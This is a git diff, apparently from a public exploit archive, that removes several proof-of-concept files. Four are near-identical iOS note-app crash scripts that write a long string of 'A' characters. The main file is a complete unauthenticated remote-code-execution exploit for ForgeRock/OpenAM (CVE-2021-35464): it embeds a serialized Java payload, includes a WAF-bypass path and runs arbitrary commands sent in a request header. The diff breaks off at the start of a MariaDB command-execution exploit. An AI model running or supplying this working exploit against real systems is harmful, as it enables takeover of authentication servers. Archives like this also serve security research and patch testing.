-# Category: DoS (iOS) - -##### Vulnerability ##### - -Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50002.py b/exploits/ios/dos/50002.py deleted file mode 100755 index 7ad0008ff..000000000 --- a/exploits/ios/dos/50002.py +++ /dev/null @@ -1,37 +0,0 @@ -# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC) -# Date: 06-14-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/es/app/post-it/id920127738 -# Version: 5.0.1 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Post-it is vulnerable to a DoS condition when a long list of characters is -being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new -payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: -f = open("payload.txt","w") -f.write(buffer) -f.close() -print ("File created") -except: -print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50003.py b/exploits/ios/dos/50003.py deleted file mode 100755 index f13b9dbc2..000000000 --- a/exploits/ios/dos/50003.py +++ /dev/null @@ -1,36 +0,0 @@ -# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC) -# Date: 06-14-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 -# Version: 6.4 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Notex – the best notes is vulnerable to a DoS condition when a long list of -characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: -f = open("payload.txt","w") -f.write(buffer) -f.close() -print ("File created") -except: -print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/local/49977.py b/exploits/ios/local/49977.py deleted file mode 100755 index 7dda87b05..000000000 --- a/exploits/ios/local/49977.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC) -# Date: 06-09-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619 -# Version: 4.2 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/java/webapps/50131.py b/exploits/java/webapps/50131.py deleted file mode 100755 index 045d7444f..000000000 --- a/exploits/java/webapps/50131.py +++ /dev/null @@ -1,152 +0,0 @@ -# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) -# Date: 2021-07-14 -# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be -# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 -# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ -# Version: [1] OpenAM 14.6.3 -# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 -# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 -# CVE: CVE-2021-35464 - -#!/usr/bin/env python3 - -''' - Copyright 2021 Photubias(c) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - File name CVE-2021-35464.py - written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be - - This is a native implementation without requirements, written in Python 3. - Works equally well on Windows as Linux (as MacOS, probably ;-) - - Rewritten from and full credits to @Y4er_ChaBug: - https://github.com/Y4er/openam-CVE-2021-35464 - and of course the discoverer @artsploit: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 - Created using https://github.com/frohoff/ysoserial -''' - -import urllib.request, urllib.parse, ssl, sys, optparse - -## Static vars; change at will, but recommend leaving as is -sURL = 'http://192.168.0.100:7080/openam' -sEndpoint = 'ccversion/Version' -sEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs -iTimeout = 5 -strSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEdmFyNQEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAGcmVzdWx0AQACW0IBAAlwcm9jZXNzb3IBABJMamF2YS9sYW5nL09iamVjdDsBAANyZXEBAARyZXNwAQABagEAAUkBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQADb2JqAQAKcHJvY2Vzc29ycwEAEExqYXZhL3V0aWwvTGlzdDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAFpAQAEZmxhZwEAAVoBAAVncm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEADVN0YWNrTWFwVGFibGUHANAHANEHANIHAKcHAKMHAJoHAJ0HAGMHAMgHAMsBAApTb3VyY2VGaWxlAQAVVG9tY2F0RWNob0luamVjdC5qYXZhDABHAEgHANIMANMA1AwA1QDWDADXANgMANkA2gcA0QwA2wDcDADdAN4MAN8A4AEABGV4ZWMMAOEA4gEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MAOMA2AEABmdsb2JhbAEADmphdmEvdXRpbC9MaXN0DADkAOUMAN0A5gEAC2dldFJlc3BvbnNlAQAPamF2YS9sYW5nL0NsYXNzDADnAOgBABBqYXZhL2xhbmcvT2JqZWN0BwDpDADqAOsBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kDADsAO0BAAlzZXRTdGF0dXMMAO4AXwEAEWphdmEvbGFuZy9JbnRlZ2VyDABHAO8BAAdvcy5uYW1lBwDwDADxAPIMAPMA4AEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABHAPQMAPUA9gcA9wwA-AD5DABHAPoBAAJcQQwA-wD8DAD9AOAMAP4A_wEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwBAAEBDAECAQMBAAhzZXRCeXRlcwwBBADoAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24MAQUASAEAI3lzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZXRTdXBlcmNsYXNzAQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0VtcHR5AQADKClaAQAEVFlQRQEABChJKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQAPcHJpbnRTdGFja1RyYWNlACEARQBGAAAAAAAEAAEARwBIAAEASQAAAC8AAQABAAAABSq3AAGxAAAAAgBKAAAABgABAAAAEQBLAAAADAABAAAABQBMAE0AAAABAE4ATwACAEkAAAA_AAAAAwAAAAGxAAAAAgBKAAAABgABAAAAYABLAAAAIAADAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFIAUwACAFQAAAAEAAEAVQABAE4AVgACAEkAAABJAAAABAAAAAGxAAAAAgBKAAAABgABAAAAZgBLAAAAKgAEAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFcAWAACAAAAAQBZAFoAAwBUAAAABAABAFUACABbAEgAAQBJAAAF7QAIABEAAAMDAzu4AAK2AANMAU0rtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4DNgQVBC2-ogLNLRUEMjoFGQXHAAanArkZBbYACjoGGQYSC7YADJoADRkGEg22AAyaAAanApsZBbYABBIOtgAGTSwEtgAHLBkFtgAIOgcZB8EAD5oABqcCeBkHtgAEEhC2AAZNLAS2AAcsGQe2AAg6BxkHtgAEEhG2AAZNpwAWOggZB7YABLYAE7YAExIRtgAGTSwEtgAHLBkHtgAIOgcZB7YABLYAExIUtgAGTacAEDoIGQe2AAQSFLYABk0sBLYABywZB7YACDoHGQe2AAQSFbYABk0sBLYABywZB7YACMAAFsAAFjoIAzYJFQkZCLkAFwEAogHLGQgVCbkAGAIAOgoZCrYABBIZtgAGTSwEtgAHLBkKtgAIOgsZC7YABBIaA70AG7YAHBkLA70AHbYAHjoMGQu2AAQSHwS9ABtZAxIgU7YAHBkLBL0AHVkDEiFTtgAewAAgOgYZBsYBVxkGtgAimgFPGQy2AAQSIwS9ABtZA7IAJFO2ABwZDAS9AB1ZA7sAJVkRAMi3ACZTtgAeVxInuAAotgApEiq2AAyZABkGvQAgWQMSK1NZBBIsU1kFGQZTpwAWBr0AIFkDEi1TWQQSLlNZBRkGUzoNuwAvWbsAMFkZDbcAMbYAMrYAM7cANBI1tgA2tgA3tgA4Og4SObgAOjoPGQ-2ADs6BxkPEjwGvQAbWQMSPVNZBLIAJFNZBbIAJFO2AD4ZBwa9AB1ZAxkOU1kEuwAlWQO3ACZTWQW7ACVZGQ6-twAmU7YAHlcZDLYABBI_BL0AG1kDGQ9TtgAcGQwEvQAdWQMZB1O2AB5XpwBOOg8SQbgAOjoQGRASQgS9ABtZAxI9U7YAPhkQBL0AHVkDGQ5TtgAeOgcZDLYABBI_BL0AG1kDGRBTtgAcGQwEvQAdWQMZB1O2AB5XBDsamQAGpwAJhAkBp_4vGpkABqcAEacACDoFpwADhAQBp_0ypwAISyq2AESxAAgAlwCiAKUAEgDFANMA1gASAhUCiAKLAEAAMAA7Au8AQwA-AFkC7wBDAFwAfALvAEMAfwLpAu8AQwAAAvoC_QBDAAMASgAAAQYAQQAAABUAAgAWAAkAFwALABgAFQAaABoAGwAmABwAMAAeADYAHwA-ACAARQAhAFwAIgBnACMAbAAkAHQAJQB_ACYAigAnAI8AKACXACoAogAtAKUAKwCnACwAuAAuAL0ALwDFADEA0wA0ANYAMgDYADMA4wA1AOgANgDwADcA-wA4AQAAOQEOADoBHQA7ASgAPAEzAD0BOAA-AUAAPwFZAEABfwBBAYwAQgG3AEMB8gBEAhUARgIcAEcCIwBIAmYASQKIAE4CiwBKAo0ASwKUAEwCtABNAtYATwLYAFEC3wA6AuUAUwLsAFYC7wBUAvEAVQL0ABwC-gBaAv0AWAL-AFkDAgBbAEsAAADeABYApwARAFwAXQAIANgACwBcAF0ACAIcAGwAXgBfAA8ClABCAF4AXwAQAo0ASQBgAGEADwHyAOYAYgBjAA0CFQDDAGQAZQAOASgBtwBmAGcACgFAAZ8AaABnAAsBWQGGAGkAZwAMAREB1ABqAGsACQA2ArYAbABtAAUARQKnAG4AbwAGAHQCeABwAGcABwEOAd4AcQByAAgC8QADAFwAcwAFACkC0QB0AGsABAACAvgAdQB2AAAACQLxAHcAeAABAAsC7wB5AHoAAgAmAtQAewB8AAMC_gAEAFwAcwAAAH0AAACoABf_ACkABQEHAH4HAH8HAAkBAAD8ABQHAID8ABoHAIEC_AAiBwCCZQcAgxJdBwCDDP0ALQcAhAH-AMsHAIIHAIIHAIJSBwCF_wCaAA8BBwB-BwB_BwAJAQcAgAcAgQcAggcAhAEHAIIHAIIHAIIHAIUHAD0AAQcAhvsASvkAAfgABvoABf8ABgAFAQcAfgcAfwcACQEAAEIHAIcE_wAFAAAAAEIHAIcEAAEAiAAAAAIAiXVxAH4AJAAAAdjK_rq-AAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAAMwABAAEAAAAFKrcAAbEAAAACAA0AAAAKAAIAAACUAAQAlQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHNyABRqYXZhLm1hdGguQmlnSW50ZWdlcoz8nx-pO_sdAwAGSQAIYml0Q291bnRJAAliaXRMZW5ndGhJABNmaXJzdE5vbnplcm9CeXRlTnVtSQAMbG93ZXN0U2V0Qml0SQAGc2lnbnVtWwAJbWFnbml0dWRldAACW0J4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHD_______________7____-AAAAAXVxAH4AJAAAAAEBeHg$' - -## Ignore unsigned certs, if any because OpenAM is default HTTP -ssl._create_default_https_context = ssl._create_unverified_context - -def checkParams(options, args): - if args: sHost = args[0] - else: - sHost = input('[?] Please enter the URL ['+sURL+'] : ') - if sHost == '': sHost = sURL - if not sHost[-1:] == '/': sHost += '/' - if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost - if options.command: sCMD = options.command - else: sCMD = '' - if options.proxy: sProxy = options.proxy - else: sProxy = '' - return (sHost, sCMD, sProxy) - -def findEndpoint(oOpener, sHost, sProxy): - def testEndpoint(sURL): - oRequest = urllib.request.Request(sURL) - if sProxy: oRequest.set_proxy(sProxy, 'http') - try: oResponse = oOpener.open(oRequest, timeout = iTimeout) - except: return False - if oResponse.code == 200: - if 'ForgeRock' in oResponse.read().decode(errors='ignore'): - print('[+] Found potential vulnerable endpoint: ' + sURL) - return True - return False - - if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint - elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint - elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint - elif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' - elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' - else: return '' - -def testVuln(oOpener, sURL, sProxy): - oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') - ## The response is actually not well formed HTTP, needs manual formatting - bResp = bytearray(15) ## "CVE-2021-35464\n" should be 15 bytes - try: oResponse.readinto(bResp) - except: pass - #print(bResp.split(b'\x00')[0]) - if 'CVE-2021-35464' in bResp.decode(): return True - else: return False - -def runVuln(oOpener, sURL, sProxy, sCMD): - oResponse = runCmd(oOpener, sURL, sProxy, sCMD) - ## The response is actually not well formed HTTP, needs manual formatting - bResp = bytearray(4096) - try: oResponse.readinto(bResp) - except: pass ## The readinto still should have worked - sResp = bResp.split(b'\x00')[0].decode() - print(sResp) - -def runCmd(oOpener, sURL, sProxy, sCMD): - oData = b'jato.pageSession=' + strSerializedPayload - oHeaders = {'cmd' : sCMD} - oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) - if sProxy: oRequest.set_proxy(sProxy, 'http') - return oOpener.open(oRequest, timeout = iTimeout) - -def main(): - usage = ( - 'usage: %prog [options] URL \n' - 'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\n' - 'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\n' - 'When in doubt, just enter a single IP address' - ) - - parser = optparse.OptionParser(usage=usage) - parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') - parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') - - ## Get or ask for the vars - (options, args) = parser.parse_args() - (sHost, sCMD, sProxy) = checkParams(options, args) - - ## Verify reachability - print('[!] Verifying reachability of ' + sHost) - oOpener = urllib.request.build_opener() - oRequest = urllib.request.Request(sHost) - if sProxy: oRequest.set_proxy(sProxy, 'http') - try: oResponse = oOpener.open(oRequest, timeout = iTimeout) - except urllib.error.HTTPError: pass - except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') - print('[+] Endpoint ' + sHost + ' reachable') - - ## Find endpoint - print('[!] Finding correct OpenAM endpoint') - sEndpoint = findEndpoint(oOpener, sHost, sProxy) - if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') - - ## Verify vulnerability - if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') - else: sys.exit('[-] Not vulnerable or this implementation does not work') - if sCMD: - print('[+] Running command "' + sCMD + '" now:\n') - runVuln(oOpener, sEndpoint, sProxy, sCMD) - else: print('[!] All done') - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/exploits/linux/local/49765.txt b/exploits/linux/local/49765.txt deleted file mode 100644 index f68d095da..000000000 --- a/exploits/linux/local/49765.txt +++ /dev/null @@ -1,20 +0,0 @@ -# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution -# Date: 03/18/2021 -# Exploit Author: 